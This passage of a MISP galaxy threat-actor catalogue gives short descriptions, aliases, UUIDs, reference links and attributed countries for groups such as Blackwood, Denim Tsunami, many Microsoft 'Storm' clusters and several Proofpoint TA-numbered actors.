cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['United States', 'Israel', 'Middle East', 'Europe'] |
cfr-target-category | ['Government', 'Finance', 'High-Tech', 'Telecoms', 'NGOs', 'Civil Society', 'Rail', 'Energy'] |
cfr-type-of-incident | Information Operations |
country | IR |
Blackwood
Blackwood is a China-aligned APT group that has been active since at least 2018. They primarily engage in cyberespionage operations targeting individuals and companies in China, Japan, and the United Kingdom. Blackwood utilizes sophisticated techniques such as adversary-in-the-middle attacks to deliver their custom implant, NSPX30, through updates of legitimate software. They also have the capability to hide the location of their command and control servers by intercepting traffic generated by the implant.
Internal MISP references
UUID 46e26e5c-ad74-45aa-a654-1afef67f4566
which can be used as unique global reference for Blackwood
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Denim Tsunami
Denim Tsunami is a threat actor group that has been involved in targeted attacks against European and Central American customers. They have been observed using multiple Windows and Adobe 0-day exploits, including one for CVE-2022-22047, which is a privilege escalation vulnerability. Denim Tsunami developed a custom malware called Subzero, which has capabilities such as keylogging, capturing screenshots, data exfiltration, and running remote shells. They have also been associated with the Austrian spyware distributor DSIRF.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Denim Tsunami.
Known Synonyms |
---|
DSIRF |
KNOTWEED |
Internal MISP references
UUID 79a347d9-1938-4550-8836-98e4ed95f77c
which can be used as unique global reference for Denim Tsunami
in MISP communities and other software using the MISP galaxy
External references
- https://www.thezdi.com/blog/2023/1/23/activation-context-cache-poisoning-exploiting-csrss-for-privilege-escalation - webarchive
- https://socradar.io/threats-of-commercialized-malware-knotweed/ - webarchive
- https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | AT |
Blue Tsunami
Blue Tsunami, also known as Black Cube, is a cyber mercenary group associated with the private intelligence firm Black Cube. They target individuals in various industries, including human rights, finance, and consulting. Blue Tsunami engages in social engineering and uses techniques such as honeypot profiles, fake jobs, and fake companies to gather human intelligence for their clients. LinkedIn and Microsoft recently took down numerous fake accounts and company pages linked to Blue Tsunami.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Blue Tsunami.
Known Synonyms |
---|
Black Cube |
Internal MISP references
UUID 46104ded-49f5-4440-bd25-e05c1126f0ba
which can be used as unique global reference for Blue Tsunami
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IL |
Cuboid Sandstorm
Cuboid Sandstorm is an Iranian threat actor that targeted an Israel-based IT company in July 2021. They gained access to the company's network and used it to compromise downstream customers in the defense, energy, and legal sectors in Israel. The group also utilized custom implants, including a remote access Trojan disguised as RuntimeBroker.exe or svchost.exe, to establish persistence on victim hosts.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cuboid Sandstorm.
Known Synonyms |
---|
DEV-0228 |
Internal MISP references
UUID a4004712-f74b-4c8c-b1fb-bb7229bc2da1
which can be used as unique global reference for Cuboid Sandstorm
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Pearl Sleet
Pearl Sleet is a nation-state activity group based in North Korea that has been active since at least 2012. In the course of its cyber-espionage activities it primarily targets North Korean defectors and media organizations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pearl Sleet.
Known Synonyms |
---|
DEV-0215 |
LAWRENCIUM |
Internal MISP references
UUID ef0d776a-51de-4965-ba1c-69ed256e0e5d
which can be used as unique global reference for Pearl Sleet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | KP |
Carmine Tsunami
Carmine Tsunami is a threat actor linked to an Israel-based private sector offensive actor called QuaDream. QuaDream sells a platform called REIGN to governments for law enforcement purposes, which includes exploits, malware, and infrastructure for data exfiltration from mobile devices. Carmine Tsunami is associated with the iOS malware called KingsPawn and has targeted civil society victims, including journalists, political opposition figures, and NGO workers, in various regions. They utilize domain registrars and inexpensive cloud hosting providers, often using single domains per IP address and deploying free Let's Encrypt SSL certificates.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Carmine Tsunami.
Known Synonyms |
---|
DEV-0196 |
QuaDream |
Internal MISP references
UUID fa76ce6a-f434-4d4a-817f-c4bd0a3f803c
which can be used as unique global reference for Carmine Tsunami
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IL |
Mustard Tempest
Mustard Tempest is a threat actor that primarily uses malvertising as their main technique to gain access to and profile networks. They deploy FakeUpdates, disguised as browser updates or software packages, to lure targets into downloading a ZIP file containing a JavaScript file. Once executed, the JavaScript framework acts as a loader for other malware campaigns, often Cobalt Strike payloads. Mustard Tempest has been associated with the cybercrime syndicate Mustard Tempest, also known as EvilCorp, and has been involved in ransomware attacks using payloads such as WastedLocker, PhoenixLocker, and Macaw.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mustard Tempest.
Known Synonyms |
---|
DEV-0206 |
Purple Vallhund |
Internal MISP references
UUID 3ce9610b-2435-4c41-80d1-3f95a5ff2984
which can be used as unique global reference for Mustard Tempest
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
UNC4990
UNC4990 is a financially motivated threat actor that has been active since at least 2020. They primarily target users in Italy and rely on USB devices for initial infection. The group has evolved their tactics over time, using encoded text files on popular websites like GitHub and Vimeo to host payloads. They have been observed using sophisticated backdoors like QUIETBOARD and EMPTYSPACE, and have targeted organizations in various industries, particularly in Italy.
Internal MISP references
UUID 7db46444-2d27-4922-8a21-98f8509476dc
which can be used as unique global reference for UNC4990
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IT |
Caramel Tsunami
Caramel Tsunami is a threat actor that specializes in spyware attacks. They have recently resurfaced with an updated toolset and zero-day exploits, targeting specific victims through watering hole attacks. Candiru has been observed exploiting vulnerabilities in popular browsers like Google Chrome and using third-party signed drivers to gain access to the Windows kernel. They have also been linked to other spyware vendors and have been associated with extensive abuses of their surveillance tools.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Caramel Tsunami.
Known Synonyms |
---|
Candiru |
SOURGUM |
Internal MISP references
UUID 062938a2-6fa1-4217-ad73-f5e0b5186966
which can be used as unique global reference for Caramel Tsunami
in MISP communities and other software using the MISP galaxy
External references
- https://decoded.avast.io/threatresearch/avast-q2-2022-threat-report/ - webarchive
- https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/ - webarchive
- https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/ - webarchive
- https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/ - webarchive
- https://www.welivesecurity.com/2021/11/16/strategic-web-compromises-middle-east-pinch-candiru/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Storm-0867
Storm-0867 is a threat actor that has been active since 2012 and has targeted various industries and regions. They employ sophisticated phishing campaigns, utilizing social engineering techniques and a phishing as a service platform called Caffeine. Their attacks involve intercepting and manipulating communication between users and legitimate services, allowing them to steal passwords, hijack sign-in sessions, bypass multifactor authentication, and modify authentication methods.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-0867.
Known Synonyms |
---|
DEV-0867 |
Internal MISP references
UUID dc1d0202-8976-4d15-810d-4af0feff6af9
which can be used as unique global reference for Storm-0867
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | EG |
Velvet Tempest
Velvet Tempest is a threat actor associated with the BlackCat ransomware group. They have been observed deploying multiple ransomware payloads, including BlackCat, and have targeted various industries such as energy, fashion, tobacco, IT, and manufacturing. Velvet Tempest relies on access brokers to gain network access and utilizes tools like Cobalt Strike Beacons and PsExec for lateral movement and payload staging. They exfiltrate stolen data using a tool called StealBit and frequently disable unprotected antivirus products.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Velvet Tempest.
Known Synonyms |
---|
DEV-0504 |
Internal MISP references
UUID 209b1452-7062-46f8-9037-3be5f7eda54f
which can be used as unique global reference for Velvet Tempest
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Sunglow Blizzard
DEV-0665 is a threat actor associated with the HermeticWiper attacks. Their objective is to disrupt, degrade, and destroy specific resources within a targeted country.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sunglow Blizzard.
Known Synonyms |
---|
DEV-0665 |
Internal MISP references
UUID 9c0f0db1-b773-42ff-a6f7-d4b6c1d28ca4
which can be used as unique global reference for Sunglow Blizzard
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Vanilla Tempest
Vice Society is a ransomware group that has been active since at least June 2021. They primarily target the education and healthcare sectors, but have also been observed targeting the manufacturing industry. The group has used multiple ransomware families and has been known to utilize PowerShell scripts for their attacks. There are similarities between Vice Society and the Rhysida ransomware group, suggesting a potential connection or rebranding.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vanilla Tempest.
Known Synonyms |
---|
DEV-0832 |
Vice Society |
Internal MISP references
UUID c4132d43-2405-43ca-9940-a6f78e007861
which can be used as unique global reference for Vanilla Tempest
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/ - webarchive
- https://fourcore.io/blogs/rhysida-ransomware-history-ttp-adversary-emulation - webarchive
- https://detect.fyi/rhysida-ransomware-and-the-detection-opportunities-3599e9a02bb2 - webarchive
- https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Lilac Typhoon
Lilac Typhoon is a threat actor attributed to China. They have been identified as exploiting the Atlassian Confluence RCE vulnerability CVE-2022-26134, which allows for remote code execution. This vulnerability has been used in cryptojacking campaigns and is included in commercial exploit frameworks. Lilac Typhoon has also been involved in deploying various payloads such as Cobalt Strike, web shells, botnets, coin miners, and ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lilac Typhoon.
Known Synonyms |
---|
DEV-0234 |
Internal MISP references
UUID b80be7a7-6d06-4da7-8ae0-302a198e7c73
which can be used as unique global reference for Lilac Typhoon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Ruby Sleet
Ruby Sleet is a threat actor linked to North Korea's Ministry of State Security. Cerium has been involved in spear-phishing campaigns, compromising devices, and conducting cyberattacks alongside other North Korean threat actors. They have also targeted companies involved in COVID-19 research and vaccine development.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ruby Sleet.
Known Synonyms |
---|
CERIUM |
Internal MISP references
UUID 03ff54cf-f7d4-4606-a531-2ca6d4fa6a54
which can be used as unique global reference for Ruby Sleet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | KP |
Raspberry Typhoon
Microsoft has tracked Raspberry Typhoon (RADIUM) as the primary threat group targeting nations that ring the South China Sea. Raspberry Typhoon consistently targets government ministries, military entities, and corporate entities connected to critical infrastructure, particularly telecoms. Since January 2023, Raspberry Typhoon has been particularly persistent. When targeting government ministries or infrastructure, Raspberry Typhoon typically conducts intelligence collection and malware execution. In many countries, targets vary from defense and intelligence-related ministries to economic and trade-related ministries.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Raspberry Typhoon.
Known Synonyms |
---|
RADIUM |
Internal MISP references
UUID 37f012df-54d8-4b3d-a288-af47240430ea
which can be used as unique global reference for Raspberry Typhoon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Phlox Tempest
Phlox Tempest is a threat actor responsible for a large-scale click fraud campaign targeting users through YouTube comments and malicious ads. They use ChromeLoader to infect victims' computers with malware, often delivered as ISO image files that victims are tricked into downloading. The attackers aim to profit from clicks generated by malicious browser extensions or node-WebKit installed on the victim's device. Microsoft and other cybersecurity organizations have issued warnings about this ongoing and prevalent campaign.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Phlox Tempest.
Known Synonyms |
---|
DEV-0796 |
Internal MISP references
UUID dd012c50-4f4f-4485-ac52-294a341f03e5
which can be used as unique global reference for Phlox Tempest
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-1295
Storm-1295 is a threat actor group, tracked by Microsoft and active since mid-2022, that operates the Greatness phishing-as-a-service (PhaaS) platform. They utilize synchronous relay servers to present targets with a replica of a sign-in page, resembling traditional phishing attacks. This adversary-in-the-middle capability allows Storm-1295 to offer their services to other attackers.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-1295.
Known Synonyms |
---|
DEV-1295 |
Internal MISP references
UUID 5f485e47-18ad-4302-85a1-0a390fe90dc1
which can be used as unique global reference for Storm-1295
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-1167
Storm-1167 is a threat actor tracked by Microsoft, known for their use of an AiTM phishing kit. They were responsible for launching an attack that led to Business Email Compromise activity.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-1167.
Known Synonyms |
---|
DEV-1167 |
Internal MISP references
UUID 17fb8267-44a3-405b-b6b9-ba7fdeb56693
which can be used as unique global reference for Storm-1167
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | ID |
Opal Sleet
Konni is a threat actor associated with APT37, a North Korean cyber crime group. They have been active since 2012 and are known for their cyber-espionage activities. Konni has targeted various sectors, including education, government, business organizations, and the cryptocurrency industry. They have exploited vulnerabilities such as CVE-2023-38831 and have used malware like KonniRAT to gain control of victim hosts and steal important information.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Opal Sleet.
Known Synonyms |
---|
Konni |
OSMIUM |
Vedalia |
Internal MISP references
UUID 5f71a9ea-511d-4fdd-9807-271ef613f488
which can be used as unique global reference for Opal Sleet
in MISP communities and other software using the MISP galaxy
External references
- https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/ - webarchive
- https://paper.seebug.org/3031/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-konni-apt-group-active-iocs-11 - webarchive
- https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/ - webarchive
- https://gbhackers.com/vedalia-apt-group-exploits/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | KP |
Storm-1044
Storm-1044 has been identified as part of a cyber campaign in collaboration with Twisted Spider. They employ a strategic approach, targeting specific endpoints using an initial access trojan called DanaBot. Once they gain access, Storm-1044 initiates lateral movement through Remote Desktop Protocol sign-in attempts, passing control to Twisted Spider. Twisted Spider then compromises the endpoints by introducing the CACTUS ransomware. Microsoft has detected ongoing malvertising attacks involving Storm-1044, leading to the deployment of CACTUS ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-1044.
Known Synonyms |
---|
DEV-1044 |
Internal MISP references
UUID 5ec7a98e-9725-4f87-8a6e-91e2b4ba04ac
which can be used as unique global reference for Storm-1044
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Pink Sandstorm
Agonizing Serpens is an Iranian-linked APT group that has been active since 2020. They are known for their destructive wiper and fake-ransomware attacks, primarily targeting Israeli organizations in the education and technology sectors. The group has strong connections to Iran's Ministry of Intelligence and Security and has been observed using various tools and techniques to bypass security measures. They aim to steal sensitive information, including PII and intellectual property, and inflict damage by wiping endpoints.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pink Sandstorm.
Known Synonyms |
---|
AMERICIUM |
Agonizing Serpens |
Agrius |
BlackShadow |
DEV-0022 |
Internal MISP references
UUID 0876c327-c82a-45f7-82fa-267c312ceb05
which can be used as unique global reference for Pink Sandstorm
in MISP communities and other software using the MISP galaxy
External references
- https://www.oodaloop.com/archive/2024/01/02/critical-infrastructure-remains-the-brass-ring-for-cyber-attackers-in-2024/ - webarchive
- https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/ - webarchive
- https://socprime.com/blog/agonizing-serpens-attack-detection-iran-backed-hackers-target-israeli-tech-firms-and-educational-institutions/ - webarchive
- https://therecord.media/iran-linked-hackers-target-israel-education-tech-sectors - webarchive
- https://www.enigmasoftware.com/moneybirdransomware-removal/ - webarchive
- https://research.checkpoint.com/2023/agrius-deploys-moneybird-in-targeted-attacks-against-israeli-organizations/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Storm-1084
Storm-1084 is a threat actor that has been observed collaborating with the MuddyWater group. They have used the DarkBit persona to mask their involvement in targeted attacks. Storm-1084 has been linked to destructive actions, including the encryption of on-premise devices and deletion of cloud resources. They have been observed using tools such as Rport, Ligolo, and a customized PowerShell backdoor. The extent of their autonomy or collaboration with other Iranian threat actors is currently unclear.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-1084.
Known Synonyms |
---|
DEV-1084 |
Internal MISP references
UUID 2cc32087-f242-4091-8634-4554635b7a58
which can be used as unique global reference for Storm-1084
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Storm-1099
Storm-1099 is a sophisticated Russia-affiliated influence actor that has been conducting pro-Russia influence operations targeting international supporters of Ukraine since Spring 2022. They are known for their website forgery operation called "Doppelganger" and have been actively spreading false information. They have been involved in pushing the claim that Hamas acquired Ukrainian weapons for an attack on Israel. Storm-1099 has also been implicated in amplifying images of graffiti in Paris, suggesting possible Russian involvement and aligning with Russia's Active Measures playbook.
Internal MISP references
UUID b05a2a56-08dc-4827-9aef-aaade91016a4
which can be used as unique global reference for Storm-1099
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Storm-1286
Storm-1286 is a threat actor that engages in large-scale spamming activities, primarily targeting user accounts without multifactor authentication enabled. They employ password spraying attacks to compromise these accounts and utilize legacy authentication protocols like IMAP and SMTP. In the past, they have attempted to compromise admin accounts and create new LOB applications with high administrative permissions to spread spam. Despite previous actions taken by Microsoft Threat Intelligence, Storm-1286 continues to explore new methods to establish a high-scale spamming platform within victim organizations using non-privileged users.
Internal MISP references
UUID 375988ab-91b9-419e-8646-a4783b931288
which can be used as unique global reference for Storm-1286
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-1101
DEV-1101 is a threat actor tracked by Microsoft who is responsible for developing and advertising phishing kits, specifically AiTM phishing kits. These kits are capable of bypassing multifactor authentication and are available for purchase or rent by other cybercriminals. DEV-1101 offers an open-source kit with various enhancements, such as mobile device management and CAPTCHA evasion. Their tool has been used in high-volume phishing campaigns by multiple actors, including DEV-0928, and is sold for $300 with VIP licenses available for $1,000.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-1101.
Known Synonyms |
---|
DEV-1101 |
Internal MISP references
UUID 8081af2c-442f-4487-9cf7-022cbe010b8f
which can be used as unique global reference for Storm-1101
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-0381
Storm-0381 is a threat actor identified by Microsoft as a Russian cybercrime group. They are known for their use of malvertising to deploy Magniber, a type of ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-0381.
Known Synonyms |
---|
DEV-0381 |
Internal MISP references
UUID 874860fe-5aee-4c94-aee1-2166c225c41e
which can be used as unique global reference for Storm-0381
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Storm-0530
H0lyGh0st is a North Korean threat actor that has been active since June 2021. They are responsible for developing and deploying the H0lyGh0st ransomware, which targets small-to-medium businesses in various sectors. The group employs "double extortion" tactics, encrypting data and threatening to publish it if the ransom is not paid. There are connections between H0lyGh0st and the PLUTONIUM APT group, indicating a possible affiliation.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-0530.
Known Synonyms |
---|
DEV-0530 |
H0lyGh0st |
Internal MISP references
UUID 47945864-c233-46e7-8b96-b427b97b0ebf
which can be used as unique global reference for Storm-0530
in MISP communities and other software using the MISP galaxy
External references
- https://ics-cert.kaspersky.com/publications/reports/2023/03/24/apt-attacks-on-industrial-organizations-in-h2-2022/ - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a - webarchive
- https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware - webarchive
- https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/ - webarchive
- https://www.picussecurity.com/resource/h0lygh0st-north-korean-threat-group-strikes-back-with-new-ransomware - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | KP |
Storm-0539
Storm-0539 is a financially motivated threat actor that has been active since at least 2021. They primarily target retail organizations for gift card fraud and theft. Their tactics include phishing via emails or SMS to distribute malicious links that redirect users to phishing pages designed to steal credentials and session tokens. Once access is gained, Storm-0539 registers a device for secondary authentication prompts, bypassing multi-factor authentication and gaining persistence in the environment. They also collect emails, contact lists, and network configurations for further attacks against the same organizations.
Internal MISP references
UUID 760b350c-522e-432d-80c5-7aab0eaf8873
which can be used as unique global reference for Storm-0539
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-1152
Storm-1152, a cybercriminal group, was recently taken down by Microsoft for illegally reselling Outlook accounts. They operated by creating approximately 750 million fraudulent Microsoft accounts and earned millions of dollars in illicit revenue. Storm-1152 also offered CAPTCHA-solving services and was connected to ransomware and extortion groups. Microsoft obtained a court order to seize their infrastructure and domains, disrupting their operations.
Internal MISP references
UUID e18dca82-0524-4338-9a66-e13e67c81ac4
which can be used as unique global reference for Storm-1152
in MISP communities and other software using the MISP galaxy
External references
- https://securityboulevard.com/2023/12/microsoft-storm-1152-crackdown-stopping-threat-actors/ - webarchive
- https://blogs.microsoft.com/on-the-issues/2023/12/13/cybercrime-cybersecurity-storm-1152-fraudulent-accounts/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-update-microsoft-warns-of-emerging-threat-by-storm-0539-behind-gift-card-frauds/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | VN |
Storm-1567
Storm-1567 is the threat actor behind the Ransomware-as-a-Service Akira. They attacked Swedish organizations in March 2023. This ransomware utilizes the ChaCha encryption algorithm, PowerShell, and Windows Management Instrumentation (WMI). Microsoft's Defender for Endpoint successfully blocked a large-scale hacking campaign carried out by Storm-1567, highlighting the effectiveness of their security solution.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-1567.
Known Synonyms |
---|
Akira |
Internal MISP references
UUID 3a912680-6f38-4fe7-9941-744f0e2280b3
which can be used as unique global reference for Storm-1567
in MISP communities and other software using the MISP galaxy
External references
- https://news.sophos.com/en-us/2023/12/20/cryptoguard-an-asymmetric-approach-to-the-ransomware-battle/ - webarchive
- https://securelist.com/crimeware-report-fakesg-akira-amos/111483/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/research/akira-ransomware.html - webarchive
- https://blog.sekoia.io/sekoia-io-mid-2023-ransomware-threat-landscape - webarchive
- https://decoded.avast.io/threatresearch/avast-q2-2023-threat-report/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Storm-0829
Nwgen is a group that focuses on data exfiltration and ransomware activities. They have been found to share techniques with other threat groups such as Karakurt, Lapsus$, and Yanluowang. Nwgen has been observed carrying out attacks and deploying ransomware, encrypting files and demanding a ransom of $150,000 in Monero cryptocurrency for the decryption software.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-0829.
Known Synonyms |
---|
DEV-0829 |
Nwgen Team |
Internal MISP references
UUID 3e595289-05b8-43fc-bd88-f8650436447f
which can be used as unique global reference for Storm-0829
in MISP communities and other software using the MISP galaxy
External references
- https://www.enigmasoftware.com/nwgenransomware-removal/ - webarchive
- https://www.databreaches.net/east-tennessee-childrens-hospital-updates-information-on-ransomware-incident/ - webarchive
- https://readme.security/cybercrime-is-more-of-a-threat-than-nation-state-hackers-6f6cccf47721 - webarchive
- https://twitter.com/cglyer/status/1546297609215696897 - webarchive
Associated metadata
Metadata key | Value |
---|---|
Storm-1674
Storm-1674 is an access broker known for using tools based on the publicly available TeamsPhisher tool to distribute DarkGate malware. Storm-1674 campaigns have typically relied on phishing lures sent over Teams with malicious attachments, such as ZIP files containing a LNK file that ultimately drops DarkGate and Pikabot. In September 2023, Microsoft observed handoffs from Storm-1674 to ransomware operators that have led to Black Basta ransomware deployment.
Internal MISP references
UUID eb7b5ed7-cf9d-4c72-8f89-a2ee070b89b6
which can be used as unique global reference for Storm-1674
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-0835
Cybercriminals have launched a phishing campaign targeting senior executives in U.S. firms, using the EvilProxy phishing toolkit for credential harvesting and account takeover attacks. This campaign, initiated in July 2023, primarily targets sectors such as banking, financial services, insurance, property management, real estate, and manufacturing. The attackers exploit an open redirection vulnerability on the job search platform "indeed.com," redirecting victims to malicious phishing pages impersonating Microsoft. EvilProxy functions as a reverse proxy, intercepting credentials, two-factor authentication codes, and session cookies to hijack accounts. The threat actors, known as Storm-0835 by Microsoft, have hundreds of customers who pay monthly fees for their services, making attribution difficult. The attacks involve sending phishing emails with deceptive links to Indeed, redirecting victims to EvilProxy pages for credential harvesting.
Internal MISP references
UUID 2da09284-be56-49cd-ad18-993a6eb17af2
which can be used as unique global reference for Storm-0835
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-1575
Storm-1575 is a threat actor identified by Microsoft as being involved in phishing campaigns using the Dadsec platform. They utilize hundreds of Domain Generation Algorithm (DGA) domains to host credential harvesting pages and target global organizations to steal Microsoft 365 credentials.
Internal MISP references
UUID 2485a9cb-b41c-43bd-8b1c-c64e919c0a4e
which can be used as unique global reference for Storm-1575
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA2552
Since January 2020, Proofpoint researchers have tracked an actor abusing Microsoft Office 365 (O365) third-party application (3PA) access, with suspected activity dating back to August 2019. The actor, known as TA2552, uses well-crafted Spanish language lures that leverage a narrow range of themes and brands. The lures entice users to click a link in the message, taking them to the legitimate Microsoft third-party apps consent page. There they are prompted to grant a third-party application read-only user permissions to their O365 account via OAuth2 or other token-based authorization methods. TA2552 seeks access to specific account resources like the user’s contacts and mail. Requesting read-only permissions for such account resources could be used to conduct account reconnaissance, silently steal data, or to intercept password reset messages from other accounts such as those at financial institutions. While organizations with global presence have received messages from this group, they appear to choose recipients who are likely Spanish speakers.
Internal MISP references
UUID e9de47f0-3e68-465c-b91e-7a2b7371955c
which can be used as unique global reference for TA2552
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA2722
TA2722 is a highly active threat actor that targets various industries including Shipping/Logistics, Manufacturing, Business Services, Pharmaceutical, and Energy. They primarily focus on organizations in North America, Europe, and Southeast Asia. This threat actor impersonates Philippine government entities and uses themes related to the government to gain remote access to target computers. Their objectives include information gathering, installing follow-on malware, and engaging in business email compromise activities.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA2722.
Known Synonyms |
---|
Balikbayan Foxes |
Internal MISP references
UUID 625c3fb4-16fc-4992-9ff2-4fad869750ac
which can be used as unique global reference for TA2722
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA2719
In late March 2020, Proofpoint researchers began tracking a new actor with a penchant for using NanoCore and later AsyncRAT, popular commodity remote access trojans (RATs). Dubbed TA2719 by Proofpoint, the actor uses localized lures with colorful images that impersonate local banks, law enforcement, and shipping services. Proofpoint has observed this actor send low volume campaigns to recipients in Austria, Chile, Greece, Hungary, Italy, North Macedonia, Netherlands, Spain, Sweden, Taiwan, United States, and Uruguay.
Internal MISP references
UUID 33bfb09d-c6f4-4403-b434-1d4d4733ec52
which can be used as unique global reference for TA2719
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Karkadann
Karkadann is a threat actor that has been active since at least October 2020, targeting government bodies and news outlets in the Middle East. They have been involved in watering hole attacks, compromising high-profile websites to inject malicious JavaScript code. The group has been linked to the commercial spyware company Candiru, suggesting they may utilize multiple spyware technologies. There are similarities in the infrastructure and tactics used by Karkadann across their campaigns.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Karkadann.
Known Synonyms |
---|
Piwiks |
Internal MISP references
UUID 8146ba06-cef2-4a94-b26e-1a4041e04c7d
which can be used as unique global reference for Karkadann
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
